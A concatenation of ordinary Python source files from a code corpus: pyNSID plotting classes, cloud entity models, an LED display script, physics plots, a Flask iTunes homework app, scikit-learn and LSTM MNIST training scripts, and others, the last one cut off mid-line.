if len(stack_dim) < 1:\n raise KeyError('stack key in dimension_dictionary must be list of length 1')\n return\n\n if stack_dim[0] != 0 or image_dims != [1,2]:\n ## axes not in expected order, displaying a copy of data with right dimensional oreder:\n self.cube = np.transpose(dset, (stack_dim[0], image_dims[0],image_dims[1]))\n else:\n self.cube = dset\n\n extent = dset.make_extent([image_dims[0],image_dims[1]])\n\n self.axis = self.fig.add_axes([0.0, 0.2, .9, .7])\n self.ind = 0\n self.img = self.axis.imshow(self.cube[self.ind].T, extent = extent, **kwargs )\n interval = 100 # ms, time between animation frames\n\n self.number_of_slices= self.cube.shape[0]\n\n self.axis.set_title('image stack: '+dset.file.filename.split('/')[-1]+'\\n use scroll wheel to navigate images')\n self.img.axes.figure.canvas.mpl_connect('scroll_event', self._onscroll)\n self.axis.set_xlabel(dset.get_dimension_labels()[image_dims[0]]);\n self.axis.set_ylabel(dset.get_dimension_labels()[image_dims[1]]);\n cbar = self.fig.colorbar(self.img)\n cbar.set_label(dset.data_descriptor)\n\n\n axidx = self.fig.add_axes([0.1, 0.05, 0.55, 0.03])\n self.slider = Slider(axidx, 'image', 0, self.cube.shape[0]-1, valinit=self.ind, valfmt='%d')\n self.slider.on_changed(self._onSlider)\n playax = self.fig.add_axes([0.7, 0.05, 0.09, 0.03])\n self.play_button = Button(playax, 'Play')#, hovercolor='0.975')\n\n self.play = False\n\n\n self.play_button.on_clicked(self._play_slice)\n\n sumax = self.fig.add_axes([0.8, 0.05, 0.09, 0.03])\n self.sum_button = Button(sumax, 'Average')#, hovercolor='0.975')\n self.sum_button.on_clicked(self._sum_slice)\n self.sum = False\n\n self.anim = animation.FuncAnimation(self.fig, self._updatefig, interval=200, blit=False, repeat = True)\n self._update()\n\n def _sum_slice(self,event):\n self.img.set_data(np.average(self.cube, axis = 0).T)\n self.img.axes.figure.canvas.draw_idle()\n\n def _play_slice(self,event):\n self.play = not self.play\n if self.play:\n self.anim.event_source.start()\n else:\n self.anim.event_source.stop()\n\n def _onSlider(self, val):\n self.ind = int(self.slider.val+0.5)\n self.slider.valtext.set_text('{}'.format(self.ind))\n self._update()\n\n def _onscroll(self, event):\n #print(\"%s %s\" % (event.button, event.step))\n if event.button == 'up':\n self.ind = (self.ind + 1) % self.number_of_slices\n else:\n self.ind = (self.ind - 1) % self.number_of_slices\n self.ind = int(self.ind)\n self.play = False\n self.anim.event_source.stop()\n self.slider.set_val(self.ind)\n\n def _update(self):\n self.img.set_data(self.cube[int(self.ind)].T)\n self.img.axes.figure.canvas.draw_idle()\n if not self.play:\n self.anim.event_source.stop()\n\n def _updatefig(self,*args):\n self.ind = (self.ind+1) % self.number_of_slices\n self.slider.set_val(self.ind)\n\n return self.img\n\nclass plot_spectrum_image(object):\n\n \"\"\"\n ### Interactive spectrum imaging plot\n\n \"\"\"\n\n def __init__(self, dset, dim_dict, figure =None, horizontal = True, **kwargs):\n\n fig_args = dict()\n temp = kwargs.pop('figsize', None)\n if temp is not None:\n fig_args['figsize'] = temp\n\n if figure == None:\n self.fig = plt.figure(**fig_args)\n else:\n self.fig = figure\n\n if len(dset.shape) <3:\n raise KeyError('dataset must have at least three dimensions')\n return\n\n ### We need one stack dimension and two image dimensions as lists in dictionary\n if 'spatial' not in dim_dict:\n raise KeyError('dimension_dictionary must contain a spatial key')\n return\n image_dims = dim_dict['spatial']\n if len(image_dims)<2:\n raise KeyError('spatial key in dimension_dictionary must be list of length 2')\n return\n\n if 'spectral' not in dim_dict:\n raise KeyError('dimension_dictionary must contain key stack or time')\n return\n spec_dim = dim_dict['spectral']\n if len(spec_dim) < 1:\n raise KeyError('spectral key in dimension_dictionary must be list of length 1')\n return\n\n if spec_dim[0] != 2 or image_dims != [0,1]:\n ## axes not in expected order, displaying a copy of data with right dimensional oreder:\n self.cube = np.transpose(dset, (image_dims[0],image_dims[1], spec_dim[0]))\n else:\n self.cube = dset\n\n extent = dset.make_extent([image_dims[0],image_dims[1]])\n\n self.horizontal = horizontal\n self.x = 0\n self.y = 0\n self.bin_x = 1\n self.bin_y = 1\n\n sizeX = self.cube.shape[0]\n sizeY = self.cube.shape[1]\n\n self.energy_scale = dset.dims[spec_dim[0]][0]\n\n self.extent = [0,sizeX,sizeY,0]\n self.rectangle = [0,sizeX,0,sizeY]\n self.scaleX = 1.0\n self.scaleY = 1.0\n self.analysis = []\n self.plot_legend = False\n\n\n if horizontal:\n self.axes = self.fig.subplots(ncols=2)\n else:\n self.axes = self.fig.subplots(nrows=2, **fig_args)\n\n self.fig.canvas.set_window_title(dset.file.filename.split('/')[-1])\n self.image = np.sum(self.cube, axis=2)\n\n self.axes[0].imshow(self.image.T, extent = self.extent, **kwargs)\n if horizontal:\n self.axes[0].set_xlabel('distance [pixels]')\n else:\n self.axes[0].set_ylabel('distance [pixels]')\n self.axes[0].set_aspect('equal')\n\n #self.rect = patches.Rectangle((0,0),1,1,linewidth=1,edgecolor='r',facecolor='red', alpha = 0.2)\n self.rect = patches.Rectangle((0,0),self.bin_x,self.bin_y,linewidth=1,edgecolor='r',facecolor='red', alpha = 0.2)\n\n self.axes[0].add_patch(self.rect)\n self.intensity_scale = 1.\n self.spectrum = self.get_spectrum()\n\n self.axes[1].plot(self.energy_scale,self.spectrum)\n self.axes[1].set_title(' spectrum {},{} '.format(self.x, self.y))\n self.xlabel = dset.get_dimension_labels()[spec_dim[0]]\n self.axes[1].set_xlabel(self.xlabel)# + x_suffix)\n self.ylabel = dset.data_descriptor\n self.axes[1].set_ylabel(self.ylabel)\n self.axes[1].ticklabel_format(style='sci', scilimits=(-2, 3))\n self.fig.tight_layout()\n self.cid = self.axes[1].figure.canvas.mpl_connect('button_press_event', self._onclick)\n\n self.fig.canvas.draw_idle()\n\n def set_bin(self,bin):\n\n old_bin_x = self.bin_x\n old_bin_y = self.bin_y\n if isinstance(bin, list):\n\n self.bin_x = int(bin[0])\n self.bin_y = int(bin[1])\n\n else:\n self.bin_x = int(bin)\n self.bin_y = int(bin)\n\n self.rect.set_width(self.rect.get_width()*self.bin_x/old_bin_x)\n self.rect.set_height((self.rect.get_height()*self.bin_y/old_bin_y))\n if self.x+self.bin_x > self.cube.shape[0]:\n self.x = self.cube.shape[0]-self.bin_x\n if self.y+self.bin_y > self.cube.shape[1]:\n self.y = self.cube.shape[1]-self.bin_y\n\n self.rect.set_xy([self.x*self.rect.get_width()/self.bin_x + self.rectangle[0],\n self.y*self.rect.get_height()/self.bin_y + self.rectangle[2]])\n self._update()\n\n def get_spectrum(self):\n if self.x > self.cube.shape[0]-self.bin_x:\n self.x = self.cube.shape[0]-self.bin_x\n if self.y > self.cube.shape[1]-self.bin_y:\n self.y = self.cube.shape[1]-self.bin_y\n\n self.spectrum = np.average(self.cube[self.x:self.x+self.bin_x,self.y:self.y+self.bin_y,:], axis=(0,1))\n #* self.intensity_scale[self.x,self.y]\n return self.spectrum\n\n def _onclick(self,event):\n self.event = event\n if event.inaxes in [self.axes[0]]:\n x = int(event.xdata)\n y = int(event.ydata)\n\n x= int(x - self.rectangle[0])\n y= int(y - self.rectangle[2])\n\n if x>=0 and y>=0:\n if x<=self.rectangle[1] and y<= self.rectangle[3]:\n self.x = int(x/(self.rect.get_width()/self.bin_x))\n self.y = int(y/(self.rect.get_height()/self.bin_y))\n\n if self.x+self.bin_x > self.cube.shape[0]:\n self.x = self.cube.shape[0]-self.bin_x\n if self.y+self.bin_y > self.cube.shape[1]:\n self.y = self.cube.shape[1]-self.bin_y\n\n self.rect.set_xy([self.x*self.rect.get_width()/self.bin_x + self.rectangle[0],\n self.y*self.rect.get_height()/self.bin_y + self.rectangle[2]])\n #self.ax1.set_title(f'{self.x}')\n self._update()\n\n def _update(self, ev=None):\n\n xlim = self.axes[1].get_xlim()\n ylim = self.axes[1].get_ylim()\n self.axes[1].clear()\n self.get_spectrum()\n\n\n self.axes[1].plot(self.energy_scale,self.spectrum, label = 'experiment')\n\n self.axes[1].set_title(' spectrum {},{} '.format(self.x, self.y))\n\n\n self.axes[1].set_xlim(xlim)\n self.axes[1].set_ylim(ylim)\n self.axes[1].set_xlabel(self.xlabel)\n self.axes[1].set_ylabel(self.ylabel)\n\n self.fig.canvas.draw_idle()\n\n\n def set_legend(self, setLegend):\n self.plot_legend = setLegend\n\n def get_xy(self):\n return [self.x,self.y]\n","sub_path":"pyNSID/viz/plot_nsid.py","file_name":"plot_nsid.py","file_ext":"py","file_size_in_byte":17450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"103673547","text":"\"\"\"iCE entities.\"\"\"\n\n\n#\n# Base entity class\n#\n\nclass Entity(object):\n \"\"\"Generic entity.\n\n :type id: str\n :type created: datetime.datetime\n :type update: datetime.datetime\n :type etag: str\n \"\"\"\n\n def __init__(self, **kwargs):\n # MongoDB stuff\n self.id = kwargs.get('_id', None)\n self.created = kwargs.get('_created', None)\n self.updated = kwargs.get('_updated', None)\n # ETag\n self.etag = kwargs.get('_etag', None)\n\n def to_dict(self):\n \"\"\"Converts the entity to dictionary.\n\n :rtype: dict\n :return: A Python dictionary with the attributes of the entity.\n \"\"\"\n _dict = {}\n for key, value in self.__dict__.items():\n if value is None:\n continue\n if key.startswith('_'):\n continue\n if key in ['id', 'created', 'updated', 'etag']: # TODO\n continue\n _dict[key] = value\n return _dict\n\n\n#\n# Session class\n#\n\nclass Session(Entity):\n \"\"\"Represents an experimentation session.\n\n :type client_ip_addr: str\n \"\"\"\n\n def __init__(self, **kwargs):\n super(Session, self).__init__(**kwargs)\n\n # Attributes\n self.client_ip_addr = kwargs['client_ip_addr']\n\n\n#\n# Instance class\n#\n\nclass Instance(Entity):\n \"\"\"Represents a cloud instance.\n\n :type session_id: str\n :type networks: list\n :type public_ip_addr: str\n :type public_reverse_dns: str\n :type ssh_username: str\n :type ssh_port: int\n :type ssh_authorized_fingerprint: str\n :type tags: dict\n \"\"\"\n\n #\n # Constructor\n #\n\n def __init__(self, **kwargs):\n super(Instance, self).__init__(**kwargs)\n\n # Session\n self.session_id = kwargs['session_id']\n\n # Networking\n self.networks = []\n for net in kwargs.get('networks', []):\n my_net = {\n 'addr': net['addr']\n }\n if 'iface' in net:\n my_net['iface'] = net['iface']\n if 'bcast_addr' in net:\n my_net['bcast_addr'] = net['bcast_addr']\n self.networks.append(my_net)\n\n # Public network\n self.public_ip_addr = kwargs['public_ip_addr']\n self.public_reverse_dns = kwargs.get('public_reverse_dns', '')\n\n # SSH options\n self.ssh_port = int(kwargs.get('ssh_port', 22))\n self.ssh_username = kwargs.get('ssh_username', '')\n self.ssh_authorized_fingerprint = kwargs.get(\n 'ssh_authorized_fingerprint', ''\n )\n\n # Tags\n self.tags = kwargs.get('tags', {})\n\n #\n # Setters\n #\n\n def add_network(self, addr, iface=None, bcast_addr=None):\n \"\"\"Adds network in the instance.\n\n :param str addr: The address and mask of the network (e.g.:\n 192.168.1.112/24).\n :param str iface: The interface of the network (e.g.: eth0).\n :param str bcast_addr: The broadcast address of the network.\n \"\"\"\n my_net = {\n 'addr': addr\n }\n if iface is not None:\n my_net['iface'] = iface\n if bcast_addr is not None:\n my_net['bcast_addr'] = bcast_addr\n self.networks.append(my_net)\n","sub_path":"ice/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"509227863","text":"# Advent of Code 2019: https://adventofcode.com/2019/day/11\n# \n# \n\nfrom AoC17_classes import Scaffoliding\n\ninfile = open('data/input_17.txt','r')\ninputData1 = infile.readline().strip().split(',')\n\n# Part 1\ne = Scaffoliding(inputData1)\ne.WriteScaff()\n# e.PlotPanels()\n\n# print(\"Part 1: \", e.NumberOfBlocks())\n\n# Part 2\n# result = w.RunAgain()\n# print(\"Part 2: \", result)\n","sub_path":"2019/Day18/code/AoC18.py","file_name":"AoC18.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"146799394","text":"#!/usr/bin/env python3\nimport time\nfrom rpi_ws281x import *\nimport argparse\n\n# LED strip0 configuration:\nLED0_COUNT = 14 # Number of leds\nLED0_PIN = 12 # GPIO pin connected to the pixels (18 uses PWM!) PIN 32\nLED0_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED0_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED0_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\nLED0_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED0_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n# LED CABLING MAP\n# /08-07\\\n# 09 06\n# 10 05\n# >11 04<\n# 12 03\n# 13 02\n# ----00-01/\n\n# LED strip1 configuration:\nLED1_COUNT = 14 # Number of leds\nLED1_PIN = 13 # GPIO pin connected to the pixels PIN 33\nLED1_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED1_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED1_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\nLED1_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED1_CHANNEL = 1 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n\n\nNUMBERMAP = [\n # [0,1,2,3,5,6,7,8,9,10,12,13], # real 0\n [], # 0 off\n [2,3,5,6], # 1\n [0,1,4,5,6,7,8,11,12,13], # 2\n [0,1,2,3,4,5,6,7,8,11], # 3\n [2,3,4,5,6,9,10,11], # 4\n [0,1,2,3,4,7,8,9,10,11], # 5\n [0,1,2,3,4,7,8,9,10,11,12,13], # 6\n [2,3,5,6,7,8], # 7\n [0,1,2,3,4,5,6,7,8,9,10,11,12,13],# 8\n [0,1,2,3,4,5,6,7,8,9,10,11] # 9\n\n]\n\n# Define functions which animate LEDs in various ways.\ndef colorWipe(strip, color, number):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(0, number):\n #print(\"Light on: {}\".format(i))\n strip.setPixelColor(i, color)\n for i in range(number, LED0_COUNT):\n #print(\"Light off: {}\".format(i))\n strip.setPixelColor(i, Color(0,0,0))\n strip.show()\n\ndef showNumber(strip, color, number):\n for i in NUMBERMAP[number]:\n #print(\"Light on: {}\".format(i))\n strip.setPixelColor(i, color)\n for i in list(set(NUMBERMAP[8]) - set(NUMBERMAP[number])):\n #print(\"Light off: {}\".format(i))\n strip.setPixelColor(i, Color(0,0,0))\n strip.show()\n\n# Main program logic follows:\nif __name__ == '__main__':\n # Process arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--num', type=int, help='number to show', required=True)\n parser.add_argument('-s', '--style', choices=['dot', 'number'], default = 'number')\n parser.add_argument('-r', '--red', type=int, default=255)\n parser.add_argument('-g', '--green', type=int, default=255)\n parser.add_argument('-b', '--blue', type=int, default=255)\n args = parser.parse_args()\n\n # Create NeoPixel objects with appropriate configuration.\n strip0 = Adafruit_NeoPixel(LED0_COUNT, LED0_PIN, LED0_FREQ_HZ, LED0_DMA, LED0_INVERT, LED0_BRIGHTNESS, LED0_CHANNEL, WS2812_STRIP)\n strip1 = Adafruit_NeoPixel(LED1_COUNT, LED1_PIN, LED1_FREQ_HZ, LED1_DMA, LED1_INVERT, LED1_BRIGHTNESS, LED1_CHANNEL, WS2812_STRIP)\n # Intialize the library (must be called once before other functions).\n strip0.begin()\n strip1.begin()\n color = Color(args.green, args.red, args.blue)\n showNumber(strip1, color, args.num)\n if args.num <= 3:\n colorWipe(strip0, color, args.num)\n\n","sub_path":"shownumber.py","file_name":"shownumber.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445088139","text":"import numpy as np\r\nimport pylab as plt\r\n\r\n#c)\r\nV_hat = np.linspace(0.4,20,100)\r\nT_hat = np.array([1.15,1.0,0.85])\r\np_hat = np.zeros((3,100))\r\n\r\nj = 0\r\ni = 0\r\n\r\nfor T in T_hat:\r\n\tfor V in V_hat:\r\n\t\tp_hat[j,i] = 8*T/(3*V - 1) - 3./V**2\r\n\t\ti += 1\r\n\ti = 0\r\n\tj += 1\r\n\r\nplt.plot(p_hat[0,:],V_hat,'-r',label=\"T/Tc = 1.15\")\r\nplt.plot(p_hat[1,:],V_hat,'-b',label=\"T/Tc = 1.0\")\r\nplt.plot(p_hat[2,:],V_hat,'-g',label=\"T/Tc = 0.85\")\r\nplt.xlabel('Volume, V/Vc')\r\nplt.ylabel('Pressure, p/pc')\r\nplt.legend()\r\n\r\nplt.show()\r\n\r\n#e)\r\n\r\nrho_hat = np.linspace(0.0,2.0,100)\r\n\r\nj = 0\r\ni = 0\r\n\r\nfor T in T_hat:\r\n\tfor rho in rho_hat:\r\n\t\tp_hat[j,i] = 8*rho*T/(3-rho) - 3*rho**2\r\n\t\ti += 1\r\n\ti = 0\r\n\tj += 1\r\n\r\nplt.plot(p_hat[0,:],rho_hat,'-r',label=\"T/Tc = 1.15\")\r\nplt.plot(p_hat[1,:],rho_hat,'-b',label=\"T/Tc = 1.0\")\r\nplt.plot(p_hat[2,:],rho_hat,'-g',label=\"T/Tc = 0.85\")\r\nplt.xlabel('Density, Rho/Rho_c')\r\nplt.xlabel('Pressure, p/p_c')\r\nplt.legend()\r\n\r\nplt.show()","sub_path":"Oblig3-c.py","file_name":"Oblig3-c.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"402000411","text":"#** Nunez, Priscilla\n#** Fall 2018\n#** HW2 completed \n\n#** HW2 is complete. Please reference the template folder. These are my own solutions - NunezP\n\n#############################\n##### IMPORT STATEMENTS #####\n#############################\nimport requests\nimport json\n\nfrom flask import Flask, request, render_template, url_for\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, RadioField, ValidationError\nfrom wtforms.validators import Required\n\n#####################\n##### APP SETUP #####\n#####################\n\napp = Flask(__name__) \napp.config['SECRET_KEY'] = 'hardtoguessstring' #** Environment Variable and hardcoded string \n\n####################\n###### FORMS #######\n####################\n\nclass AlbumEntryForm(FlaskForm): #** Form - string, validation and labels\n album_name = StringField('Enter the name of an album:', validators=[Required()])\n options = RadioField('How much do you like this album? (1 low, 3 high)', validators=[Required()], choices=[('1','1'), ('2','2'), ('3','3')], default='3')\n submit = SubmitField('Submit')\n\n\n####################\n###### ROUTES ######\n####################\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/user/')\ndef hello_user(name):\n return '

Hello {0}

'.format(name) #** 0 is for (name)\n\n@app.route('/artistform') #** Has artistform.html page\ndef artistform():\n return render_template('artistform.html')\n\n@app.route('/artistinfo')\ndef artistinfo():\n artist = request.args.get('artist') #** Normal form is used \n if artist:\n url = \"https://itunes.apple.com/search\"\n params = {\"media\": \"music\", \"term\": artist}\n get_name = requests.get(url, params = params)\n json_format = json.loads(get_name.text)\n \n return render_template('artist_info.html', objects=json_format[\"results\"])\n\n@app.route('/artistlinks')\ndef artistlinks():\n return render_template('artist_links.html')\n\n@app.route('/specific/song/')\ndef specific_song(artist_name):\n if artist_name:\n url = \"https://itunes.apple.com/search\"\n params = {\"media\": \"music\", \"term\": artist_name}\n get_name = requests.get(url, params = params)\n json_format = json.loads(get_name.text)\n\n context = {\n 'results': json_format[\"results\"],\n }\n return render_template('specific_artist.html', **context) #** **context - will group all context together and pass them to template. All the data (variables passed) used to render itself in templates. Example: 'form','data', 'results'\n\n@app.route('/album_entry')\ndef album_entry():\n form = AlbumEntryForm() #** Create Instance of form\n return render_template('album_entry.html', form=form) #** Pass down\n\n@app.route('/album_result')\ndef album_result():\n args = request.args\n album_name = args.get('album_name')\n star = args.get('options')\n \n data = {\n \"star\": star,\n \"album_name\": album_name #** Added paragraph inbetween {{form.album_name.label}} and added label options along with submit button\n }\n \n return render_template('album_data.html', data=data)\n\n\nif __name__ == '__main__':\n app.run(use_reloader=True,debug=True)","sub_path":"SI364W18_HW2.py","file_name":"SI364W18_HW2.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"136638837","text":"import os\nfrom shutil import rmtree, copyfile\n\nfrom family_foto.models import db\nfrom family_foto.models.file import File\nfrom family_foto.models.photo import Photo\nfrom tests.base_test_case import BaseTestCase\n\nPHOTOS_SAVE_PATH = './photos'\nRESIZED_SAVE_PATH = './resized-images'\n\n\nclass BasePhotoTestCase(BaseTestCase):\n \"\"\"\n Base Test Case with handles everything regarding photos.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n if not os.path.exists('./photos'):\n os.mkdir(PHOTOS_SAVE_PATH)\n if os.path.exists(RESIZED_SAVE_PATH):\n rmtree(RESIZED_SAVE_PATH)\n File.query.delete()\n Photo.query.delete()\n\n copied_path = copyfile('./data/example.jpg', f'{PHOTOS_SAVE_PATH}/example.jpg')\n if not os.path.exists(copied_path):\n raise FileNotFoundError(f'{copied_path} does not exists.')\n self.photo = Photo(filename='example.jpg', url='/photos/example.jpg')\n\n def tearDown(self):\n if os.path.exists(PHOTOS_SAVE_PATH):\n rmtree(PHOTOS_SAVE_PATH)\n super().tearDown()\n\n def test_commit(self):\n \"\"\"Tests committing the file works\"\"\"\n db.session.add(self.photo)\n db.session.commit()\n\n photo = Photo.query.get(self.photo.id)\n self.assertEqual(self.photo, photo)\n","sub_path":"tests/base_photo_test_case.py","file_name":"base_photo_test_case.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"17584705","text":"#! python3\n# mcb.pyw - Saves and loads pieces of text to the clipboard.\n# Usage:\tpython3 mcb.pyw save - Saves clipboard to keyword\n#\t\t\tpython3 mcb.pyw delete - deletes the keyword\n#\t\t\tpython3 mcb.pyw - Loads the keyword to clipboard\n#\t\t\tpython3 mcb.pyw list - Loads all keywords to the clipboard\n#\t\t\tpython3 mcb.pyw delete - deletes all keywords\n\nimport shelve, pyperclip, sys\n\nmcbShelf = shelve.open('mcb')\n\n# Save and delete clipboard content.\nif len(sys.argv) == 3:\n\tif sys.argv[1].lower() == 'save':\n\t\tmcbShelf[sys.argv[2]] = pyperclip.paste()\n\telif sys.argv[1].lower() == 'delete':\n\t\tdel mcbShelf[sys.argv[2]]\n\t\nelif len(sys.argv) == 2:\n# List all keywords, delete all keywords and load content.\n\tif sys.argv[1].lower() == 'list':\n\t\tpyperclip.copy(str(list(mcbShelf.keys())))\n\telif sys.argv[1].lower() == 'delete':\n\t\tfor item in list(mcbShelf.keys()):\n\t\t\tdel mcbShelf[item]\n\telif sys.argv[1] in mcbShelf:\n\t\tpyperclip.copy(mcbShelf[sys.argv[1]])\n\nmcbShelf.close()\n","sub_path":"ATBSWP/Chap8/mcb.pyw","file_name":"mcb.pyw","file_ext":"pyw","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"11798070","text":"import preprocess\nimport config\n\nimport os\nimport time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import AdaBoostClassifier, GradientBoostingClassifier, RandomForestClassifier\nfrom mlxtend.classifier import StackingClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import accuracy_score, roc_auc_score\n\ndef train_model(X_train, y_train, X_test, y_test, model_name, model, param_range):\n \"\"\"\n\n 根据给定的参数训练模型,并返回\n 1. 最优模型\n 2. 平均训练耗时\n 3. 准确率\n \"\"\"\n print('训练{}...'.format(model_name))\n clf = GridSearchCV(estimator=model,\n param_grid=param_range,\n cv=5,\n scoring='accuracy',\n refit=True)#refit=True,完成五折交叉验证后又进行一次整个训练集的训练\n start = time.time()\n clf.fit(X_train, y_train)\n # 计时\n end = time.time()\n duration = end - start\n print('耗时{:.4f}s'.format(duration))\n\n # 验证模型\n print('训练准确率:{:.3f}'.format(clf.score(X_train, y_train)))\n\n score = clf.score(X_test, y_test)\n print('测试准确率:{:.3f}'.format(score))\n print('训练模型耗时: {:.4f}s'.format(duration))\n print()\n\n return clf, score, duration\n\ndef main():\n \"\"\"\n 主函数\n \"\"\"\n # 准备数据集\n train_data, test_data = preprocess.prepare_data()\n\n # 查看数据集\n preprocess.inspect_dataset(train_data, test_data)\n\n # 特征工程处理\n # 构建训练测试数据\n X_train, X_test = preprocess.do_feature_engineering(train_data, test_data)\n\n print('共有{}维特征。'.format(X_train.shape[1]))\n\n # 标签处理\n y_train = train_data['label'].values\n y_test = test_data['label'].values\n\n # 数据建模及验证\n print('\\n===================== 数据建模及验证 =====================')\n sclf = StackingClassifier(classifiers=[KNeighborsClassifier(),\n SVC(kernel='linear'),\n DecisionTreeClassifier()],\n meta_classifier=LogisticRegression())\n # 指定各分类器的参数\n model_name_param_dict = {'kNN': (KNeighborsClassifier(),\n {'n_neighbors': [5, 15, 25]}),\n 'LR': (LogisticRegression(),\n {'C': [0.01, 1, 100]}),\n 'SVM': (SVC(kernel='linear'),\n {'C': [0.01, 1, 100]}),\n 'DT': (DecisionTreeClassifier(),\n {'max_depth': [50, 100, 150]}),\n 'Stacking': (sclf,\n {'kneighborsclassifier__n_neighbors': [5, 15, 25],\n 'svc__C': [0.01, 1, 100],\n 'decisiontreeclassifier__max_depth': [50, 100, 150],\n 'meta-logisticregression__C': [0.01, 1, 100]}),\n 'AdaBoost': (AdaBoostClassifier(),\n {'n_estimators': [50, 100, 150, 200]}),\n 'GBDT': (GradientBoostingClassifier(),\n {'learning_rate': [0.01, 0.1, 1, 10, 100]}),\n 'RF': (RandomForestClassifier(),\n {'n_estimators': [100, 150, 200, 250]}),\n 'NB': (GaussianNB(), {'priors': [None]})}\n # model_name_param_dict = {'NB': (GaussianNB(), {'priors': [None]})}\n # 比较结果的DataFrame\n results_df = pd.DataFrame(columns=['Accuracy (%)', 'Time (s)'],\n index=list(model_name_param_dict.keys()))\n results_df.index.name = 'Model'\n\n for model_name, (model, param_range) in model_name_param_dict.items():\n best_clf, best_acc, mean_duration = train_model(X_train, y_train, X_test, y_test,\n model_name, model, param_range)\n results_df.loc[model_name, 'Accuracy (%)'] = best_acc * 100\n results_df.loc[model_name, 'Time (s)'] = mean_duration\n results_df.to_csv(os.path.join(config.output_path, 'model_comparison.csv'))\n\n # 模型及结果比较\n print('\\n===================== 模型及结果比较 =====================')\n\n plt.figure(figsize=(10, 4))\n ax1 = plt.subplot(1, 2, 1)\n results_df.plot(y=['Accuracy (%)'], kind='bar', ylim=[40, 100], ax=ax1, title='Accuracy(%)', legend=False)\n\n ax2 = plt.subplot(1, 2, 2)\n results_df.plot(y=['Time (s)'], kind='bar', ax=ax2, title='Time (s)', legend=False)\n plt.tight_layout()\n plt.savefig(os.path.join(config.output_path, './pred_results.png'))\n plt.show()\n\nif __name__ == '__main__':\n main()\n","sub_path":"device_classify1.2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154722672","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 19 23:00:23 2017\n\n@author: Chris\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import time\nimport pickle\n\n# Parameters\nLEARN_RATE = 0.001 # 0.001\nBATCHSIZE = 100 # 100\nTRAINSIZE = 55000\nEPOCHS = 5\nNUMITER = EPOCHS*TRAINSIZE//BATCHSIZE\nSEQ_LENGTH = 784\nHIDDEN_UNITS = 32\nOUT_CELLS = 100\nNCLASSES = 10\nSNAP_INTERVAL = 10\nNUMSNAPS = NUMITER//SNAP_INTERVAL\nCHKPOINT = \"/LSTM32_params_new.ckpt\"\n#CHKPOINT = \"C:/Users/Chris/SkyDrive/MSc/Advanced_Topics/Assignment2/LSTM32_params.ckpt\"\nPKLFILE = \"LSTM32_data.pckl\"\n#PKLFILE = \"C:/Users/Chris/SkyDrive/MSc/Advanced_Topics/Assignment2/LSTM32_data.pckl\"\n\n# Vectors for saving training and test accuracy and cross-entropy\ntrain_accuracy = np.zeros(NUMSNAPS)\ntest_accuracy = np.zeros(NUMSNAPS)\ntrain_crossent = np.zeros(NUMSNAPS)\ntest_crossent = np.zeros(NUMSNAPS)\n\ndef binarize(images, threshold=0.1):\n return (threshold < images).astype('float32')\n\n# Import MNIST data\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n#train_images = np.expand_dims(binarize(mnist.train.images), axis=2)\ntest_images = np.expand_dims(binarize(mnist.test.images), axis=2)\ntestsize = test_images.shape[0]\ntestbatches = testsize//BATCHSIZE\n\n# Clear graph and set up placeholders for data\ntf.reset_default_graph()\n#x = tf.placeholder(tf.float32, [None, 784, 1])\n#ytrue = tf.placeholder(tf.float32, [None, 10])\n\nx = tf.placeholder(tf.float32, [BATCHSIZE, SEQ_LENGTH, 1])\nytrue = tf.placeholder(tf.float32, [BATCHSIZE, NCLASSES])\n\n# Define RNN model\ncell = tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_UNITS, state_is_tuple=True)\nval, state = tf.nn.dynamic_rnn(cell, x, dtype=tf.float32)\nval = tf.transpose(val, [1, 0, 2])\nlast = tf.gather(val, int(val.get_shape()[0]) - 